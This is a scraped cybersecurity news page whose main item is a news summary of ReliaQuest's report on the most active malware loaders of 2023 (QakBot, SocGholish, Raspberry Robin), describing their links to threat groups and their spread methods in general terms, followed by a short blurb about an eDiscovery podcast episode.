What works in IT may not in an operational technology/industrial control systems environment where availability and safety of operations must be maintained.
Related Posts
Top 3 Malware Loaders of 2023 that Fueling 80% of Cyber Attacks
Top 3 Malware Loaders of 2023 that Fueling 80% of Cyber Attacks
SOC teams find malware loaders challenging, as the different loaders, even for the same malware, need distinct mitigation.
Besides this, they are the key and most important elements for initial network access and payload delivery, for which remote-access software and post-exploitation tools are most sought.
Detecting a malware loader doesn’t always mean network compromise, as sometimes, in the kill chain, it’s stopped early.
However, cybersecurity analysts at ReliaQuest have recently uncovered a multitude of malware loaders that were observed to be the most active this year in 2023.
Unveiled Malware Loaders
Here below, we have mentioned all the malware loaders that were unveiled recently by the cybersecurity experts at ReliaQuest:-
SOCGholish
Gootloader
Among them, the top 3 malware loaders that were observed to be the most active by the security researchers are:-
QBot (aka QakBot, QuackBot, Pinkslipbot)
SocGholish (aka FakeUpdates)
Raspberry Robin
Most observed malware loaders (Source – Reliaquest)
Technical Analysis of Top 3 Malware Loaders
Here below, we have mentioned the technical analysis of all the top 3 malware loaders:-
Document
FREE Demo
Deploy Advanced AI-Powered Email Security Solution
Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware
QakBot
QakBot started as a banking trojan and swiftly evolved with more functions. Beyond network entry, it does the following things:-
Spreads payloads
Steals data
Aids lateral movement
Enables remote execution
Qbot is linked to the “Black Basta” ransomware gang, and it operates discovery, C2 communication, info relay, and payload drop for post-exploitation goals.
QakBot swiftly adapted to Microsoft’s MOTW with HTML smuggling. It also shifted payload file types, even using OneNote files in a Feb 2023 campaign against US entities.
SocGholish
SocGholis is a notorious JavaScript-based loader that primarily targets users and entities using Windows OS. This malware loader spreads through drive-by downloads on compromised websites, fooling visitors with Microsoft Teams and Adobe Flash fake updates.
SocGholish is tied to the Russia-based group “Evil Corp,” which targets US industries like-
Accommodation
Retail
Law
Apart from this, It’s also connected to “Exotic Lily,” an initial access broker, selling access gained through phishing to other threat actors, including ransomware groups.
This malware loader emerged in 2022, spreading through compromised websites and social engineering. With just a few clicks, it can impact entire domains or networks, and in 2023, it launched several watering hole attacks aggressively.
Raspberry Robin
Raspberry Robin is a highly elusive worm-turned-loader that targets users and entities using Microsoft Windows OS. It spreads through malicious USB devices, using LNK files to trigger native Windows processes and download its DLL.
Moreover, this malware loader uses many techniques to evade detection, including creating scheduled tasks and code injection.
Raspberry Robin is linked to multiple dangerous groups, including Evil Corp and Silence (aka Whisper Spider).
In addition to the Cobalt Strike tool, Raspberry Robin is used by threat actors to deliver multiple variants of ransomware and other malware like-
Clop
Moreover, the Raspberry Robin malware loader is also linked to SocGholish ops in legal and financial services organizations in Q1 2023, signaling crime syndicate collab.
Keep informed about the latest Cyber Security News by following us on Google News, Linkedin, Twitter, and Facebook.
The post Top 3 Malware Loaders of 2023 that Fueling 80% of Cyber Attacks appeared first on Cyber Security News.
Cyber Security News
How eDiscovery Can Help You Reduce Data and Risks in Three Steps
How eDiscovery Can Help You Reduce Data and Risks in Three Steps
As data volumes continue to balloon, it’s becoming clear that the quickest path to victory does not involve the fewest steps. This month’s episode of Uncovering Hidden Risks explores ways to defensibly move data minimization decisions upstream to collaboratively expedite the eDiscovery process. EJ Bastien, Director of Discovery Programs at Microsoft, joins Erica Toelle and guest host Caitlin Fitzgerald for the discussion. EJ leads the eDiscovery and Litigation Support team at Microsoft. EJ shares his experience using technology to address the challenges of eDiscovery in the modern cloud world and shares some strategies and best practices to help mitigate risk. Read More
The CyberWire